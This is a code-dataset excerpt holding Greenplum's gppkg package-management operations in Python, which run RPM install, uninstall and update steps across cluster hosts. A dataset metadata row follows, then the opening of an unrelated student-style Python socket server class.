'''
logger.debug('_get_gpdb_version')
self.gphome = gp.get_gphome()
version = gp.GpVersion.local('local GP software version check', self.gphome)
gpdb_version = GpVersion(version.strip())
return gpdb_version
class ValidateInstallPackage(Operation):
"""
Ensure that the given rpms can be installed safely. This is accomplished mainly
through use of rpm --test, which will have one of a few outcomes:
1) A return code of 0, indicating the installation should proceed smoothly
2) A non-zero return code, and stderr indicating some of the rpms are already installed.
We simply omit such rpms from the returned list of rpms, indicating to the caller
that to be successful, installation should only be attempted on the filtered list of rpms.
3) A non-zero return code, and stderr indicating that a failed dependency issue will arise.
This scenario must result in a MissingDependencyError.
Note: install and update share this code, because there is extensive commonality with regard
to the version, OS, and arch checking, in addition to the 3 code paths enumerated just above.
Lastly, for an edge case, if we determine that all of the relevant rpms are currently installed
*and* the archive package already exists we declare the package is already installed.
TODO: This is depending on ExtractPackage having put the dependencies in this same directory.
TODO: Use regexes for more reliable string matching. CR-2865#c20112
"""
def __init__(self, gppkg, is_update = False):
self.gppkg = gppkg
self.is_update = is_update
def execute(self):
#Check the GPDB requirements
if not IsVersionCompatible(self.gppkg).run():
raise GpdbVersionError
# TODO: AK: I've changed our use of the OS tag from 'Linux' to 'rhel5' or 'suse10'.
# So, the two lines below will not work properly.
#if self.gppkg.os.lower() != platform.system().lower():
# raise OSCompatibilityError(self.gppkg.os, platform.system().lower())
#architecture compatibility
if self.gppkg.architecture.lower() != platform.machine().lower():
raise ArchCompatibilityError(self.gppkg.architecture, platform.machine().lower())
rpm_set = set([self.gppkg.main_rpm] + self.gppkg.dependencies)
rpm_install_string = ' '.join([os.path.join(TEMP_EXTRACTION_PATH, rpm) for rpm in rpm_set])
if self.is_update:
rpm_install_command = 'rpm --test -U --force %s --dbpath %s --prefix %s' % (rpm_install_string, RPM_DATABASE, RPM_INSTALLATION_PATH)
else:
rpm_install_command = 'rpm --test -i %s --dbpath %s --prefix %s' % (rpm_install_string, RPM_DATABASE, RPM_INSTALLATION_PATH)
cmd = Command('Validating rpm installation', rpm_install_command)
logger.info(cmd) # TODO: AK: This should be debug(), but RMI cannot propagate a log level.
try:
cmd.run(validateAfter = True)
except ExecutionError, e:
lines = e.cmd.get_results().stderr.splitlines()
# Forking between code paths 2 and 3 depends on some meaningful stderr
# Without such stderr, we must bubble up the ExecutionError.
if len(lines) == 0:
raise
if 'failed dependencies' in lines[0].lower():
# Code path 3 (see docstring)
# example stderr:
# error: Failed dependencies:
# geos-3.2.2-1.x86_64.rpm is needed by postgis-1.0-1.x86_64
# TODO: AK: Dependencies should be parsed out here and used to initialize
# this MissingDependencyError. However, this exception does not support
# multiple missing dependencies. Some refactoring work is needed in both places.
logger.error(e.cmd.get_results().stderr)
raise MissingDependencyError('')
# Code path 2, possibly (see docstring)
# example stderr:
# package geos-3.2.2-1.x86_64 is already installed
# package proj-4.7.0-1.x86_64 is already installed
# package postgis-1.0-1.x86_64 is already installed
for line in lines:
if 'already installed' in line.lower():
package_name = line.split()[1]
rpm_name = "%s.rpm" % package_name
rpm_set.remove(rpm_name)
else:
# This is unexpected, so bubble up the ExecutionError.
raise
# MPP-14359 - installation and uninstallation prechecks must also consider
# the archive. That is, if a partial installation had added all rpms
# but failed to add the archive package, then for our purposes, we consider
# the package not yet installed and still in need of InstallPackageLocally.
archive_package_exists = CheckFile(os.path.join(GPPKG_ARCHIVE_PATH, self.gppkg.pkg)).run()
package_already_installed = (not rpm_set) and archive_package_exists
if package_already_installed:
raise AlreadyInstalledError(self.gppkg.pkg)
# Code path 1 (See docstring)
return rpm_set
class ValidateUninstallPackage(Operation):
"""
Ensure that the given rpms can be uninstalled safely. This is accomplished mainly
through use of rpm --test, which will have one of a few outcomes:
1) A return code of 0, indicating the uninstallation should proceed smoothly
2) A non-zero return code, and stderr indicating some of the rpms are already uninstalled.
We simply omit such rpms from the returned list of rpms, indicating to the caller
that to be successful, uninstallation should only be attempted on the filtered list of rpms.
3) A non-zero return code, and stderr indicating that dependencies remain.
Lastly, for an edge case, if we determine that none of the relevant rpms are currently installed
*and* the archive package does not exist, we declare the package is not installed.
TODO: Use regexes for more reliable string matching.
"""
def __init__(self, gppkg):
self.gppkg = gppkg
def execute(self):
rpm_list = [self.gppkg.main_rpm] + self.gppkg.dependencies
def strip_extension_and_arch(filename):
# expecting filename of form %{name}-%{version}-%{release}.%{arch}.rpm
rest, ext = os.path.splitext(filename)
rest, arch = os.path.splitext(rest)
return rest
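# e.g. strip_extension_and_arch('geos-3.2.2-1.x86_64.rpm') -> 'geos-3.2.2-1'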
rpm_set = set([strip_extension_and_arch(rpm) for rpm in rpm_list])
rpm_uninstall_string = ' '.join(rpm_set)
rpm_uninstall_command = 'rpm --test -e %s --dbpath %s' % (rpm_uninstall_string, RPM_DATABASE)
cmd = Command('Validating rpm uninstallation', rpm_uninstall_command)
logger.info(cmd) # TODO: AK: This should be debug(), but RMI cannot propagate a log level.
try:
cmd.run(validateAfter = True)
except ExecutionError, e:
lines = e.cmd.get_results().stderr.splitlines()
# Forking between code paths 2 and 3 depends on some meaningful stderr
# Without such stderr, we must bubble up the ExecutionError.
if len(lines) == 0:
raise
if 'failed dependencies' in lines[0].lower():
# Code path 3 (see docstring)
# example stderr:
# error: Failed dependencies:
# jre = 1.6.0_26 is needed by (installed) gphdfs-1.1-1.x86_64
self.resolve_shared_dependencies(rpm_set, lines[1:])
else:
# Code path 2, possibly (see docstring)
# example stderr:
# error: package postgis-1.0-1.x86_64 is not installed
# error: package proj-4.7.0-1.x86_64 is not installed
# error: package geos-3.2.2-1.x86_64 is not installed
for line in lines:
if 'not installed' in line.lower():
package_name = line.split()[2]
rpm_set.remove(package_name)
else:
# This is unexpected, so bubble up the ExecutionError.
raise
# MPP-14359 - installation and uninstallation prechecks must also consider
# the archive. That is, if a partial uninstallation had removed all rpms
# but failed to remove the archive package, then for our purposes, we consider
# the package installed and still in need of UninstallPackageLocally.
archive_package_exists = CheckFile(os.path.join(GPPKG_ARCHIVE_PATH, self.gppkg.pkg)).run()
package_not_installed = (not rpm_set) and (not archive_package_exists)
if package_not_installed:
raise NotInstalledError(self.gppkg.pkg)
# Code path 1 (See docstring)
return rpm_set
def resolve_shared_dependencies(self, rpm_set, dependency_lines):
"""
This is a very naive resolution to shared dependencies. (See code path #3 in ValidateUninstallPackage.execute)
Among the rpms we attempt to remove from the system, a subset cannot be
removed during this particular gppkg uninstallation, because their removal would violate
the dependency constraints of other rpms that remain in the system; we simply leave these culprit rpm(s) behind.
More specifically, the preceding rpm --test -e command has given us the violated *capabilities*. For each *capability*,
we query the rpm database with --whatprovides to discern the culprit rpm(s).
In simpler terms, consider this example:
pljava depends on jre, which its gppkg contains
gphdfs depends on jre, which its gppkg contains
install the gppkgs for both pljava and gphdfs
uninstall pljava gppkg
we internally attempt to "rpm -e" the jre rpm, hitting the gphdfs dependency error here involving "jre = 1.6"
we determine that the jre rpm is responsible for *providing* "jre = 1.6"
so, we ultimately omit the jre rpm from our "rpm -e" and move on
TODO: AK: A more robust version of this function would ensure that the remaining
rpms are, in fact, bound by a remaining gppkg. We defer this responsibility for now because gppkgs
should not have external dependencies. That is, no package should have requirements on rpms
not contained in its own gppkg distro. So, it's safe to assume that if foo is a culprit rpm, there exists
some gppkg bar that internally contains foo. (I realize that, with time, this will not be a scalable requirement
for gppkgs... hence the TODO.)
@type rpm_set: set
@param rpm_set: rpms being uninstalled, among which there exists an rpm
whose removal violates the dependencies of remaining rpms
@type dependency_lines: list
@param dependency_lines: lines produced from the stderr in
code path #3 in ValidateUninstallPackage.execute
ex: [" jre >= 1.6.0_26 is needed by (installed) gphdfs-1.1-1.x86_64"]
"""
for dependency_line in dependency_lines:
violated_capability = dependency_line.split()[0] # e.g. "jre"
cmd = Command('Discerning culprit rpms for %s' % violated_capability,
'rpm -q --whatprovides %s --dbpath %s' % (violated_capability, RPM_DATABASE))
cmd.run(validateAfter = True)
culprit_rpms = set(cmd.get_results().stdout.splitlines())
rpm_set -= culprit_rpms
class ExtractPackage(Operation):
"""
Extract the contents of the package into the temp folder
TODO: AK: Extraction should be implemented as a context manager.
"""
def __init__(self, gppkg):
self.gppkg = gppkg
def execute(self):
#clean up tmp extraction folder
if os.path.exists(TEMP_EXTRACTION_PATH) and not CleanupDir(TEMP_EXTRACTION_PATH).run():
logger.error('Could not clean temp folder')
raise IOError
#untar the package into tmp folder
with closing(tarfile.open(self.gppkg.abspath)) as tarinfo:
tarinfo.extractall(TEMP_EXTRACTION_PATH)
#move all the deps into same folder as the main rpm
path = os.path.join(TEMP_EXTRACTION_PATH, DEPS_DIR)
if os.path.exists(path):
for cur_file in os.listdir(path):
shutil.move(os.path.join(TEMP_EXTRACTION_PATH, DEPS_DIR, cur_file), TEMP_EXTRACTION_PATH)
class InstallPackageLocally(Operation):
"""
Installs a package on the local host
This operation must take a slew of starting conditions and drive the state
of the local machine towards the ending state, in which the given package is successfully
installed, the rpm database is sane, and the package resides in the designated archive.
To that end, we indiscriminately squash AlreadyInstalledErrors arising from ValidateInstallPackage,
because in this context, it's not an exception, but rather an indication of our desired ending
conditions.
We must consider the following scenarios and more: package was deleted from archive,
the main comprising rpm was uninstalled, dependent rpms were removed, the rpm database was
corrupted, etc.
Again, much like ValidateInstallPackages, we make cheap reuse of this code for the purposes
of an --update as there is considerable commonality.
"""
def __init__(self, package_path, is_update = False):
self.package_path = package_path
self.is_update = is_update
def execute(self):
current_package_location = self.package_path
package_name = os.path.basename(current_package_location)
logger.info('Installing %s locally' % package_name)
final_package_location = os.path.join(GPPKG_ARCHIVE_PATH, package_name)
gppkg = Gppkg.from_package_path(current_package_location)
ExtractPackage(gppkg).run()
# squash AlreadyInstalledError here: the caller doesn't ever need to
# know that we didn't have to do anything here
try:
rpm_set = ValidateInstallPackage(gppkg, is_update = self.is_update).run()
except AlreadyInstalledError, e:
logger.info(e)
return
if rpm_set:
if self.is_update:
rpm_install_command = 'rpm -U --force %s --dbpath %s --prefix=%s'
else:
rpm_install_command = 'rpm -i %s --dbpath %s --prefix=%s'
rpm_install_command = rpm_install_command % \
(" ".join([os.path.join(TEMP_EXTRACTION_PATH, rpm) for rpm in rpm_set]),
RPM_DATABASE,
RPM_INSTALLATION_PATH)
cmd = Command('Installing rpms', rpm_install_command)
logger.info(cmd)
cmd.run(validateAfter = True)
# TODO: AK: MPP-15568
# TODO: AK: abstraction layer for archive interactions... to hide use of shutil.copy, RemoveFile, etc.
MakeDir(GPPKG_ARCHIVE_PATH).run()
shutil.copy(current_package_location, final_package_location)
logger.info("Completed local installation of %s." % package_name)
class UninstallPackageLocally(Operation):
"""
Uninstalls a package on the local host
This operation must take a slew of starting conditions and drive the state
of the local machine towards the ending state, in which the given package is successfully
uninstalled, the rpm database is sane, and the package is removed from the archive.
To that end, we indiscriminately squash NotInstalledErrors arising from ValidateUninstallPackage,
because in this context, it's not an exception, but rather an indication of our desired ending
conditions.
We must consider the following scenarios and more: package was deleted from archive,
the main comprising rpm was uninstalled, dependent rpms were removed, the rpm database was
corrupted, etc.
"""
def __init__(self, package_name):
self.package_name = package_name
def execute(self):
# TODO: AK: MPP-15737 - we're entirely dependent on the package residing in the archive
current_package_location = os.path.join(GPPKG_ARCHIVE_PATH, self.package_name)
gppkg = Gppkg.from_package_path(current_package_location)
# squash NotInstalledError here: the caller doesn't ever need to
# know that we didn't have to do anything here
try:
rpm_set = ValidateUninstallPackage(gppkg).run()
except NotInstalledError, e:
logger.info(e)
return
if rpm_set:
rpm_uninstall_command = 'rpm -e %s --dbpath %s' % (" ".join(rpm_set), RPM_DATABASE)
cmd = Command('Uninstalling rpms', rpm_uninstall_command)
logger.info(cmd)
cmd.run(validateAfter = True)
# TODO: AK: abstraction layer for archive interactions... to hide use of shutil.copy, RemoveFile, etc.
MakeDir(GPPKG_ARCHIVE_PATH).run()
RemoveFile(current_package_location).run()
logger.info("Completed local uninstallation of %s." % self.package_name)
class SyncPackages(Operation):
"""
Synchronizes packages from master to a remote host
TODO: AK: MPP-15568
"""
def __init__(self, host):
self.host = host
def execute(self):
if not CheckDir(GPPKG_ARCHIVE_PATH).run():
MakeDir(GPPKG_ARCHIVE_PATH).run()
if not CheckRemoteDir(GPPKG_ARCHIVE_PATH, self.host).run():
MakeRemoteDir(GPPKG_ARCHIVE_PATH, self.host).run()
# set of packages on the master
master_package_set = set(ListFilesByPattern(GPPKG_ARCHIVE_PATH, '*' + GPPKG_EXTENSION).run())
# set of packages on the remote host
remote_package_set = set(ListRemoteFilesByPattern(GPPKG_ARCHIVE_PATH, '*' + GPPKG_EXTENSION, self.host).run())
# packages to be uninstalled on the remote host
uninstall_package_set = remote_package_set - master_package_set
# packages to be installed on the remote host
install_package_set = master_package_set - remote_package_set
if not install_package_set and not uninstall_package_set:
logger.info('The packages on %s are consistent.' % self.host)
return
if install_package_set:
logger.info('The following packages will be installed on %s: %s' % (self.host, ', '.join(install_package_set)))
for package in install_package_set:
logger.debug('copying %s to %s' % (package, self.host))
dstFile = os.path.join(GPHOME, package)
Scp(name = 'copying %s to %s' % (package, self.host),
srcFile = os.path.join(GPPKG_ARCHIVE_PATH, package),
dstFile = dstFile,
dstHost = self.host).run(validateAfter = True)
RemoteOperation(InstallPackageLocally(dstFile), self.host).run()
RemoveRemoteFile(dstFile, self.host).run()
if uninstall_package_set:
logger.info('The following packages will be uninstalled on %s: %s' % (self.host, ', '.join(uninstall_package_set)))
for package in uninstall_package_set:
RemoteOperation(UninstallPackageLocally(package), self.host).run()
class InstallPackage(Operation):
def __init__(self, gppkg, master_host, standby_host, segment_host_list):
self.gppkg = gppkg
self.master_host = master_host
self.standby_host = standby_host
self.segment_host_list = segment_host_list
def execute(self):
logger.info('Installing package %s' % self.gppkg.pkg)
# TODO: AK: MPP-15736 - precheck package state on master
ExtractPackage(self.gppkg).run()
ValidateInstallPackage(self.gppkg).run()
# perform any pre-installation steps
PerformHooks(hooks = self.gppkg.preinstall,
master_host = self.master_host,
standby_host = self.standby_host,
segment_host_list = self.segment_host_list).run()
# distribute package to segments
srcFile = self.gppkg.abspath
dstFile = os.path.join(GPHOME, self.gppkg.pkg)
GpScp(srcFile, dstFile, self.segment_host_list).run()
# install package on segments
HostOperation(InstallPackageLocally(dstFile), self.segment_host_list).run()
# install package on standby
if self.standby_host:
Scp(name = 'copying %s to %s' % (srcFile, self.standby_host),
srcFile = srcFile,
dstFile = dstFile,
dstHost = self.standby_host).run(validateAfter = True)
RemoteOperation(InstallPackageLocally(dstFile), self.standby_host).run()
# install package on master
InstallPackageLocally(srcFile).run()
# perform any post-installation steps
PerformHooks(hooks = self.gppkg.postinstall,
master_host = self.master_host,
standby_host = self.standby_host,
segment_host_list = self.segment_host_list).run()
logger.info('%s successfully installed.' % (self.gppkg.pkg))
class PerformHooks(Operation):
def __init__(self, hooks, master_host, standby_host, segment_host_list):
"""
Performs steps that have been specified in the yaml file for a particular
stage of gppkg execution
TODO: AK: A packager may have added commands to their hooks, with the
assumption that the current working directory would be that which contains
the spec file, rpms, and other artifacts (external scripts, perhaps.) To support
this, these commands should be prefixed with a "cd".
TODO: AK: I'm adding master_host for consistency.
But, why would we ever need master_host? We're on the master host!
"""
self.hooks = hooks
self.master_host = master_host
self.standby_host = standby_host
self.segment_host_list = segment_host_list
def execute(self):
if self.hooks is None:
return
for hook in self.hooks:
key = hook.keys()
if not key:
return
key_str = key[0]
if key_str.lower() == 'master':
if self.standby_host:
RemoteCommand(hook[key_str], [self.standby_host]).run()
LocalCommand(hook[key_str], True).run()
elif key_str.lower() == 'segment':
RemoteCommand(hook[key_str], self.segment_host_list).run()
class UninstallPackage(Operation):
def __init__(self, gppkg, master_host, standby_host, segment_host_list):
self.gppkg = gppkg
self.master_host = master_host
self.standby_host = standby_host
self.segment_host_list = segment_host_list
def execute(self):
logger.info('Uninstalling package %s' % self.gppkg.pkg)
# TODO: AK: MPP-15736 - precheck package state on master
ExtractPackage(self.gppkg).run()
ValidateUninstallPackage(self.gppkg).run()
# perform any pre-uninstallation steps
PerformHooks(hooks = self.gppkg.preuninstall,
master_host = self.master_host,
standby_host = self.standby_host,
segment_host_list = self.segment_host_list).run()
# uninstall on segments
HostOperation(UninstallPackageLocally(self.gppkg.pkg), self.segment_host_list).run()
if self.standby_host:
RemoteOperation(UninstallPackageLocally(self.gppkg.pkg), self.standby_host).run()
UninstallPackageLocally(self.gppkg.pkg).run()
# perform any pre-installation steps
PerformHooks(hooks = self.gppkg.postuninstall,
master_host = self.master_host,
standby_host = self.standby_host,
segment_host_list = self.segment_host_list).run()
logger.info('%s successfully uninstalled.' % self.gppkg.pkg)
class QueryPackage(Operation):
INFO, LIST, ALL = range(3)
def __init__(self, query_type, package_path):
self.query_type = query_type
self.package_path = package_path
def execute(self):
if self.query_type == QueryPackage.INFO:
def package_details(p):
yield 'Name', p.pkgname
yield 'Version', p.version
yield 'Architecture', p.architecture
yield 'OS', p.os
yield 'GPDBVersion', str(p.gpdbversion)
yield 'Description', p.description
def print_package_info(package):
tabLog = TableLogger()
for name, value in package_details( package ):
tabLog.info([name, value])
tabLog.outputTable()
package = Gppkg.from_package_path(self.package_path)
print_package_info( package )
elif self.query_type == QueryPackage.LIST:
package = Gppkg.from_package_path(self.package_path)
for file in package.file_list:
print file
elif self.query_type == QueryPackage.ALL:
package_name_list = ListPackages().run()
for package_name in package_name_list:
print package_name
else:
package = Gppkg.from_package_path(self.package_path)
try:
ExtractPackage(package).run()
ValidateInstallPackage(package).run()
except AlreadyInstalledError:
print '%s is installed.' % package.pkgname
else:
print '%s is not installed.' % package.pkgname
class BuildGppkg(Operation):
'''
Builds a gppkg given a directory containing
the spec file, rpms and any pre/post installation scripts
'''
def __init__(self, directory):
self.directory = directory
def execute(self):
directory = self.directory
logger.info('Building gppkg')
#Check if the directory is valid
if not os.path.exists(directory) or not os.path.isdir(directory):
logger.error('%s is an invalid directory' % directory)
raise BuildPkgError
filelist = os.listdir(directory)
#Check for the spec file
specfile = directory + '/' + SPECFILE_NAME
if not os.path.exists(specfile):
logger.error('Spec file does not exist')
raise BuildPkgError
#parse the spec file and get the name, version and arch
#this is used to name the gppkg
pkg_path_details = self._get_package_name_details(specfile)
if pkg_path_details is None:
raise BuildPkgError
#If the file already exists, replace it with the new one
pkg = pkg_path_details['pkgname'] + '-' + str(pkg_path_details['version']) + '-' + pkg_path_details['os'] + '-' + pkg_path_details['architecture'] + GPPKG_EXTENSION
if os.path.exists(pkg):
os.remove(pkg)
#Verify the spec file
if not self._verify_specfile(specfile, directory):
raise BuildPkgError
#tar and gzip the directory
#rename the file with .gppkg extension
with closing(tarfile.open(pkg, 'w:gz')) as tarinfo:
for cur_file in filelist:
tarinfo.add(name = os.path.join(directory, cur_file),
arcname = cur_file)
logger.info('Completed building gppkg')
def _get_package_name_details(self, specfile):
'''
Get details about the name, version, operating system, architecture
of the package. The final gppkg which will be created
will be named as <name>-<version>-<os>-<arch>.gppkg
'''
logger.debug('_get_package_name_details')
cur_file = None
with open(specfile) as cur_file:
yamlfile = yaml.load(cur_file)
tags = yamlfile.keys()
pkg_path_details = {}
#return all the required tags as a dict
for tag in tags:
if tag.lower() in SPECFILE_REQUIRED_TAGS:
pkg_path_details[tag.lower()] = yamlfile[tag]
return pkg_path_details
def _verify_specfile(self, specfile, directory):
'''
Reads the spec file and makes sure that the tags are correct.
'''
logger.debug('_verify_specfile')
cur_file = None
try:
with open(specfile) as cur_file:
yamlfile = yaml.load(cur_file)
if not self._verify_tags(yamlfile):
return False
return True
except ScannerError, ex:
return False
def _verify_tags(self, yamlfile):
'''
Verify that the tags are valid.
Returns true if all tags are valid
False otherwise
'''
logger.debug('_verify_tags')
tags = yamlfile.keys()
tags = [tag.lower() for tag in tags]
#check required tags
for required_tag in SPECFILE_REQUIRED_TAGS:
if required_tag not in tags:
logger.error('Required tag %s missing in Spec file' % required_tag)
return False
#check for invalid tags
for tag in tags:
if tag not in SPECFILE_OPTIONAL_TAGS and tag not in SPECFILE_REQUIRED_TAGS:
logger.error('Invalid tag %s in Spec file' % tag)
return False
return True
class UpdatePackage(Operation):
""" TODO: AK: Enforce gppkg version is higher than currently installed version """
def __init__(self, gppkg, master_host, standby_host, segment_host_list):
self.gppkg = gppkg
self.master_host = master_host
self.standby_host = standby_host
self.segment_host_list = segment_host_list
def execute(self):
logger.info('Updating package %s' % self.gppkg.pkg)
ExtractPackage(self.gppkg).run()
ValidateInstallPackage(self.gppkg, is_update = True).run()
# distribute package to segments
srcFile = self.gppkg.abspath
dstFile = os.path.join(GPHOME, self.gppkg.pkg)
GpScp(srcFile, dstFile, self.segment_host_list).run()
# update package on segments
HostOperation(UpdatePackageLocally(dstFile), self.segment_host_list).run()
# update package on standby
if self.standby_host:
Scp(name = 'copying %s to %s' % (srcFile, self.standby_host),
srcFile = srcFile,
dstFile = dstFile,
dstHost = self.standby_host).run(validateAfter = True)
RemoteOperation(UpdatePackageLocally(dstFile), self.standby_host).run()
# update package on master
UpdatePackageLocally(srcFile).run()
# perform any post-update steps
PerformHooks(hooks = self.gppkg.postupdate,
master_host = self.master_host,
standby_host = self.standby_host,
segment_host_list = self.segment_host_list).run()
logger.info('%s successfully updated.' % (self.gppkg.pkg))
class UpdatePackageLocally(Operation):
"""
Updates a package on the local host
We make cheap reuse of InstallPackageLocally with the propagation of is_update = True, which
effectively changes the rpm --test command to use -U instead of -i. Beyond the invocation of
InstallPackageLocally, here, we also clean up the archive directory to remove other (ideally, older)
versions of the updated package.
"""
def __init__(self, package_path):
self.package_path = package_path
def execute(self):
InstallPackageLocally(self.package_path, is_update = True).run()
# Remove other versions of the package from archive.
# Note: Do not rely on filename format to discern such packages.
# Rather, interrogate a package only through the Gppkg class interface.
current_package = Gppkg.from_package_path(self.package_path)
MakeDir(GPPKG_ARCHIVE_PATH).run()
archived_package_paths = ListFiles(GPPKG_ARCHIVE_PATH).run()
for archived_package_path in archived_package_paths:
temp_package = Gppkg.from_package_path(os.path.join(GPPKG_ARCHIVE_PATH, archived_package_path))
if temp_package.pkgname == current_package.pkgname and temp_package.version != current_package.version:
RemoveFile(os.path.join(GPPKG_ARCHIVE_PATH, archived_package_path)).run()
class CleanGppkg(Operation):
'''
Cleans up the Gppkg from the cluster in case of partial
installation or removal. This might not be required if
we can make the install and uninstall options idempotent.
This operation is exactly the same as remove but we dont
check on each host to see if the rpm is installed or not.
'''
def __init__(self, standby_host, segment_host_list):
self.standby_host = standby_host
self.segment_host_list = segment_host_list
def execute(self):
operations = [SyncPackages(host) for host in self.segment_host_list]
if self.standby_host:
operations.append(SyncPackages(self.standby_host))
ParallelOperation(operations).run()
for operation in operations:
try:
operation.get_ret()
except Exception, e:
raise ExceptionNoStackTraceNeeded('SyncPackages failed: ' + str(e))
logger.info('Successfully cleaned the cluster')
class MigratePackages(Operation):
"""
Migrates packages from another $GPHOME to this one
This functionality is meant to facilitate minor version upgrade, whereby old packages
need to be brought over from the older $GPHOME to the newer $GPHOME.
Presumably, this could also be used to migrate packages across arbitrary choices
of $GPHOMEs. However, the migration will only succeed if the packages being migrated
are actually compatible with the target GPDB.
"""
def __init__(self, from_gphome, to_gphome):
self.from_gphome, self.to_gphome = from_gphome, to_gphome
def execute(self):
if not os.path.samefile(self.to_gphome, GPHOME):
raise ExceptionNoStackTraceNeeded('The target GPHOME, %s, must match the current $GPHOME used to launch gppkg.' % self.to_gphome)
if os.path.samefile(self.to_gphome, self.from_gphome):
raise ExceptionNoStackTraceNeeded('The source and target GPHOMEs, %s => %s, must differ for packages to be migrated.' % (self.from_gphome, self.to_gphome))
# TODO: AK: Given an invalid from_gphome, we'll end up creating a 'share/packages' subdirectory within it.
old_archive_path = os.path.join(self.from_gphome, ARCHIVE_PATH)
MakeDir(old_archive_path).run()
packages = ListFilesByPattern(old_archive_path, '*' + GPPKG_EXTENSION).run()
if not packages:
logger.info('There are no packages to migrate from %s.' % self.from_gphome)
return
logger.info('The following packages will be migrated: %s' % ', '.join(packages))
for package in packages:
package_path = os.path.join(old_archive_path, package)
try:
InstallPackageLocally(package_path).run()
except AlreadyInstalledError:
logger.info("%s is already installed." % package)
except Exception:
logger.exception("Failed to migrate %s from %s" % (package, old_archive_path))
logger.info('The package migration has completed.')
class GpScp(Operation):
"""
TODO: AK: This obviously does not belong here. My preference would be that it remain here until
the following problem is solved.
MPP-15270 - Improve performance of file transfer across large clusters
I suggest:
We consume an extra parameter 'fanout'. We partition the host_list into a number of buckets
given by 'fanout'. For each bucket, we scp the artifact to the first host in the bucket, and then
we recursively invoke GpScp on that machine for the remaining hosts in its bucket.
GpScp := ParallelOperation([ A(i) for i in range(0, n) ])
A := SerialOperation(B, C)
B := scp source_path target_path @ host_i
where host_i := the first host in the ith bucket
C := RemoteOperation(GpScp(target_path, target_path, host_list_i))
where host_list_i := the remaining hosts in the ith bucket
"""
def __init__(self, source_path, target_path, host_list):
self.source_path = source_path
self.target_path = target_path
self.host_list = host_list
self.pool = None
def execute(self):
self.pool = WorkerPool()
for host in self.host_list:
self.pool.addCommand(Scp(name = 'copying %s to %s' % (self.source_path, host),
srcFile = self.source_path,
dstFile = self.target_path,
dstHost = host))
self.pool.join()
class HostOperation(Operation):
"""
TODO: AK: This obviously does not belong here. My preference would be to move it to gppylib.operations.utils
when another consumer becomes clear.
TODO: AK: For generality, the underlying operation should inherit/implement NestedHostOperation so that
it may be initialized with information about the host to which it's been bound. This is fortunately not necessary
for our purposes here, so it's deferrable.
TODO: AK: Build a SegHostOperation that wraps this and is driven by GpArray content.
TODO: AK: Implement something similar for a SegmentOperation + NestedSegmentOperation.
TODO: AK: This (as well as ParallelOperation) would benefit from an appropriate choice of return value. The likely
choice would be: [op.get_ret() for op in self.operations]
"""
def __init__(self, operation, host_list):
self.operation = operation
self.host_list = host_list
def execute(self):
operations = []
for host in self.host_list:
operations.append(RemoteOperation(self.operation, host))
ParallelOperation(operations).run()
for operation in operations:
operation.get_ret()
|
lpetrov-pivotal/gpdb
|
gpMgmt/bin/gppylib/operations/package.py
|
Python
|
apache-2.0
| 53,027
|
[
"ORCA"
] |
6e64536d248d25e8db8b17d528a1885c1ad23dd0151853a0f83f8889f0944c41
|
__author__ = 'chris hamm'
#NetworkServer_r9E
#Created: 1/17/2015
#THINGS ADDED/CHANGED FROM THIS REVISION
#Now able to receive a chunk object from the controller class
#Extract information from a chunk object (THESE FUNCTIONS ARE NO LONGER NEEDED)
#(In progress) Send extracted information over the network to the client
#Changed data type of dictionary of clients waiting for a reply to a list
#THINGS ADDED FROM REVISION 9D
#Added lists for the server to use to keep track of things that have happened and still need to be done
#A list that records all of the clients that have crashed (and have been detected as crashed)
#A list of clients that are waiting for a reply
#(In Progress) A list of what each client is currently working on
#(In progress) A list of chunk objects that contains the chunk of a crashed client (chunk added when client crashes, and chunk is removed when a new client is given the chunk)
#dictionary that records how many times each command has been issued by the server
#-Outbound Commands from server to controller
#-Outbound Commands from server to client
#-Inbound Commands from Controller to server
#-Inbound Commands for Client to server
#Added functions to parse chunk objects (Has now been decided that these will not be needed)
#chunk object path: server-controller -> server (converted to string to be sent over network) -> client (convert back to chunk object) -> client-controller
import socket
import platform
import Chunk
#=================================================================================================
#SERVER CONSTRUCTOR/CLASS DEFINITION
#=================================================================================================
class NetworkServer(): #CLASS NAME WILL NOT CHANGE BETWEEN VERSIONS
#class variables
host= '' #Symbolic name, meaning all available interfaces
port= 49200
numOfClients= 0
serverSocket = 0
serverIsRunning = True
#list to store the socket and address of every client
listOfClients = [] #This list is a list of tuples (socket, address)
listOfControllerMessages = [] #holds a list of strings that have been sent by the controller class
listOfCrashedClients= [] #records the ip address of any client that has crashed during the last server run
#listOfInactiveClients = [] #records the ip address of any client who needs something to do
#dictionary (below) that holds the ip of each client that is waiting for a reply as the key and what it is waiting for as the value
#dictionaryOfClientsWaitingForAReply = {} #Possible values: "NEXTCHUNK", "FOUNDSOLUTION"
listOfClientsWaitingForAReply= []
dictionaryOfCurrentClientTasks = {} #dictionary that holds the ip of each client as the key and the chunk it is working on as the value
recordOfOutboundCommandsFromServerToController = {} #dictionary that records how many times the server has issued a command to the controller
recordOfInboundCommandsFromControllerToServer = {} #dictionary that records how many times the server received a command from the controller
recordOfOutboundCommandsFromServerToClient = {} #dictionary that records how many times the server has issued a command to the client
recordOfInboundCommandsFromClientToServer = {} #dictionary that records how many times the server received a command from from the client(s)
#--------------------------------------------------------------------------------
#constructor
#--------------------------------------------------------------------------------
def __init__(self, pipeendconnectedtocontroller):
self.pipe= pipeendconnectedtocontroller
#socket.AF_INET is a socket address family represented as a pair. (hostname, port). This is the default parameter
#socket.SOCK_STREAM is the default parameter. This defines the socket type
self.serverSocket= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "STATUS: Server socket created successfully"
#..................................................................................
#Bind the socket to local host and port
#..................................................................................
try: #Bind socket try block
self.serverSocket.bind((self.host,self.port))
print "STATUS: Socket bind complete."
except socket.error as inst:
print "========================================================================================"
print "ERROR: failed to bind (host, port) to serverSocket"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
print inst #__str__ allows args to be printed directly
print "========================================================================================"
raise Exception("Could not bind to socket! Server Must Shut Down.")
#..................................................................................
#Detect Operating System
#..................................................................................
try: #getOS try block
print "*************************************"
print " Network Server"
print "*************************************"
print "OS DETECTION:"
if(platform.system()=="Windows"): #Detecting Windows
print platform.system()
print platform.win32_ver()
elif(platform.system()=="Linux"): #Detecting Linux
print platform.system()
print platform.dist()
elif(platform.system()=="Darwin"): #Detecting OSX
print platform.system()
print platform.mac_ver()
else: #Detecting an OS that is not listed
print platform.system()
print platform.version()
print platform.release()
print "*************************************"
except Exception as inst:
print "========================================================================================"
print "ERROR: An exception was thrown in getOS try block"
print type(inst) #the exception instance
print inst.args #arguments stored in .args
